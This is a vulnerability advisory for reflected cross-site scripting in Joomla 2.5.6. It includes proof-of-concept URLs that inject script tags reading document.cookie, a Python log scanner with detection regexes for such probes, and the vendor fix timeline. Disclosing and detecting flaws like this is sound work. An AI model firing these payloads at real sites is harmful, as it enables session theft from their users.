SSCHADV2012-014 - Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory: Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-014
Author: Stefan Schurtz
Affected Software: Successfully tested on Joomla 2.5.6
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
With the module "Module Language Switcher – position-4" enabled (Extensions -> Modules -> Module Manager: Module Language Switcher), multiple cross-site scripting (XSS) vulnerabilities are possible: the request path is reflected into the page without proper escaping, as the PoC URLs below show.
==============
PoC-Exploit
==============
// with default sample content
http://[target]/joomla/index.php/image-gallery/"><script>alert(document.cookie)</script>/25-koala
http://[target]/joomla/index.php/image-gallery/"><script>alert('xss')</script>/25-koala
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert(document.cookie)</script>
http://[target]/joomla/index.php/image-gallery/animals/25-"><script>alert('xss')</script>
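<script>alert(‘xss’)</script>">
For defenders, the PoC shape above (a quote and closing bracket followed by a new tag inside the request path) is easy to hunt for in web-server access logs. The following is an added example, not part of the advisory or of Joomla: it parses combined-format log lines (the sample lines are constructed here), percent-decodes the path, since scanners and browsers usually encode the payload, and flags requests matching the pattern.

```python
"""Flag access-log requests carrying the tag-injection pattern from this advisory.
Added example (not advisory or Joomla code); log lines below are constructed."""
import re
from urllib.parse import unquote

# Combined log format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# A quote or bracket that closes the current attribute/tag, followed by a new tag.
TAG_BREAKOUT_RE = re.compile(r'["\'>]\s*<\s*/?[a-z]', re.IGNORECASE)
# Script content even without a context breakout (e.g. reflected in text context).
SCRIPT_RE = re.compile(r'<\s*script\b|javascript:', re.IGNORECASE)

def decode_path(path: str) -> str:
    """Percent-decode repeatedly (max 3 rounds) so double encoding does not hide the payload."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_xss_probe(path: str) -> bool:
    """True if the decoded path breaks out of HTML context or carries script."""
    decoded = decode_path(path)
    return bool(TAG_BREAKOUT_RE.search(decoded) or SCRIPT_RE.search(decoded))

def scan_log(lines):
    """Return (client_ip, decoded_path, status) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        client, _ts, _method, path, status, _size = m.groups()
        if is_xss_probe(path):
            hits.append((client, decode_path(path), int(status)))
    return hits

# Constructed sample: single- and double-encoded copies of the PoC shape, plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jun/2012:10:00:01 +0200] "GET /joomla/index.php/image-gallery/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E/25-koala HTTP/1.1" 200 5120',
    '203.0.113.5 - - [28/Jun/2012:10:00:02 +0200] "GET /joomla/index.php/image-gallery/animals/25-%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 4980',
    '198.51.100.9 - - [28/Jun/2012:10:00:03 +0200] "GET /joomla/index.php/image-gallery/animals/25-koala HTTP/1.1" 200 4870',
]

if __name__ == "__main__":
    for client, path, status in scan_log(SAMPLE_LOG):
        print(f"{client} {status} {path}")
```

A 200 status on a flagged request is what matters here: the fixed 2.5.7 release still returns the page, but the reflected payload is escaped, so pair this log check with a version inventory rather than treating hits alone as proof of compromise.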
=====
Solution
=====
Upgrade to version 2.5.7
================
Disclosure Timeline
================
28-Jun-2012 – vendor informed (security@joomla.org)
05-Jul-2012 – vendor informed again (security@joomla.org)
13-Sep-2012 – fixed by vendor
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======